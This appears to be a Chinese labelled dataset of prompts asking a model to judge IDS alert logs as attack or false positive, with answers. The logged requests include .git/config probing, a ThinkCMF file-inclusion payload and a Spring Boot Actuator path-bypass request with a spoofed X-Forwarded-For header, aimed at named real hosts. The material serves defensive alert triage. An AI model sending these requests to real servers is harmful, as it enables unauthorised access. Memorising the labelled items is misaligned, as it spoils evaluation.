你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732698322", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732698322, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "3.251.68.146", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 58458}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTkuMC4wLjAgU2FmYXJpLzUzNy4zNiBFZGcvMTE5LjAuMC4wDQpBY2NlcHQtQ2hhcnNldDogdXRmLTgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29ubmVjdGlvbjogY2xvc2UNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.16", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.16/.git/config", "first_access_time": "2024-11-27 17:05:22", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "爱尔兰--都柏林郡--都柏林", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.222", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "3a9c422988da3a03e189bf557d17f815", "proto": "http", "xff": "", "alarm_id": "20241127_8311988f5fe5d521659a6b7039562a0a", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 17:05:22", "attack_addr": "爱尔兰--都柏林郡--都柏林(53.349764/-6.260246)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732698301", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "3.251.68.146", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.16\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "3.251.68.146", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Edge/119.0.0\", \"hw_type\": \"PC\"}}", "host_md5": "5704a8d93ab5f08f2d5f86217a1377f4", "sport": "58458", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732697285", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.192.104", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732697285, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.192.104", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 10080, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "172.208.9.27", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 48674}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogY2RwLmhuLnNnY2MuY29tLmNuOjEwMDgwDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoQ2VudE9TOyBMaW51eCB4ODZfNjQ7IHJ2OjEyNy4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEyNy4wDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "cdp.hn.sgcc.com.cn:10080", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "cdp.hn.sgcc.com.cn:10080/.git/config", "first_access_time": "2024-11-27 16:48:05", "hazard_level": "6", "accept-language": "en", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--纽约州--纽约", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.192.104", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "4a41254339d505b24ae28b584fea88d6", "proto": "http", "xff": "", "alarm_id": "20241127_810406dcb6a7f489c44b4f26fa3658d2", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 16:48:05", "attack_addr": "美国--纽约州--纽约(40.714550/-74.007141)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "10080", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732697264", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "172.208.9.27", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: cdp.hn.sgcc.com.cn:10080\r\nUser-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "172.208.9.27", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Firefox/127.0\", \"hw_type\": \"PC\"}}", "host_md5": "272f47141c4827beb45afc7831e1ee80", "sport": "48674", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732695438", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件包含", "_origin": {"write_date": 1732695438, "vuln_harm": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。\r\n影响版本:\r\nThinkCMF X1.6.0\r\nThinkCMF X2.1.0\r\nThinkCMF X2.2.0\r\nThinkCMF X2.2.1\r\nThinkCMF X2.2.2\r\nThinkCMF X2.2.3", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "", "hit_end": 28, "uri": "/?a=display&templateFile=config.yaml", "dport": 80, "vuln_name": "ThinkCMF框架任意文件包含漏洞", "rsp_status": 0, "code_language": "", "solution": "1、请管理员及时升级官网补丁。\r\n2、缓释措施:将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected", "hit_start": 8, "detail_info": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。", "xff": "", "sip": "140.143.94.194", "vuln_desc": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。", "public_date": "2019-10-23 13:06:12", "sport": 65195}, "detail_info": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。", "file_md5": "", "rule_key": "webids", "connection": "Keep-Alive", "api": "www.hnsee.cn/", "first_access_time": "2024-11-27 16:17:18", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--四川省--成都市", "templatefile": "config.yaml", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "ThinkCMF框架任意文件包含漏洞", "alarm_sip": "172.23.64.208", "skyeye_index": "", "sip_ioc_dip": "7ef694544506901467d51051ad95534f", "xff": "", "vuln_desc": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。", "attack_chain": "0x02020000", "vuln_harm": "远程攻击者在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。\r\n影响版本:\r\nThinkCMF X1.6.0\r\nThinkCMF X2.1.0\r\nThinkCMF X2.2.0\r\nThinkCMF X2.2.1\r\nThinkCMF X2.2.2\r\nThinkCMF X2.2.3", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732695418", "code_language": "", "public_date": "2019-10-23 13:06:12", "skyeye_serial_num": "QbJK/8ze/", "a": "display", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "28", "h_proto_version": "HTTP/1.1", "uri": "/?a=display&templateFile=config.yaml", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002072f", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "140.143.94.194", "host_md5": "f277d9e25889aee14f4872ea879149f4", "user-agent": "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", "referer": "http://www.hnsee.cn/?a=display&templateFile=config.yaml", "vlan_id": "", "vuln_type": "ThinkCMF框架任意文件包含漏洞", "attack_type": "文件包含", "is_web_attack": "1", "dip": "172.23.64.208", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、请管理员及时升级官网补丁。\r\n2、缓释措施:将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改为 protected", "hit_start": "8", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/YT1kaXNwbGF5JnRlbXBsYXRlRmlsZT1jb25maWcueWFtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NClJlZmVyZXI6IGh0dHA6Ly93d3cuaG5zZWUuY24vP2E9ZGlzcGxheSZ0ZW1wbGF0ZUZpbGU9Y29uZmlnLnlhbWwNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjEpDQpIb3N0OiB3d3cuaG5zZWUuY24NCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hnsee.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_685967e064191d77c7d916b192880c9f", "access_time": "2024-11-27 16:17:18", "attack_addr": "中国--四川省--成都市(30.676235/104.058986)", "type_chain": "160F0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "140.143.94.194", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /?a=display&templateFile=config.yaml HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nReferer: http://www.hnsee.cn/?a=display&templateFile=config.yaml\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\nHost: www.hnsee.cn\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568367-ThinkCMF框架任意文件包含漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"IE/9.0\", \"hw_type\": \"PC\"}}", "sport": "65195", "h_url": "/?a=display&templateFile=config.yaml"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690270", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690270, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 539, "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 519, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "101.34.251.108", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 45406}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:51:10", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "03ea5a9ed3785e7a82e6a8777d846b3e", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732690249", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "539", "h_proto_version": "HTTP/1.1", "uri": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.34.251.108", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "519", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3N5L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM182KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzYuMC4zODA5LjEwMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LHpoLUNOO3E9MC44LHpoO3E9MC43DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANCkROVDogMQ0KUmVmZXJlcjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_2e36320142fcc3fa863828d3e79066e8", "access_time": "2024-11-27 14:51:10", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "101.34.251.108", "dimension": "3", "url_path": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.13\", \"software\": \"Chrome/76.0.3809\", \"hw_type\": \"PC\"}}", "sport": "45406", "h_url": "/html/sy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732690270", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732690270, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 495, "uri": "/html/yz/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 475, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "111.231.115.230", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 35350}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": 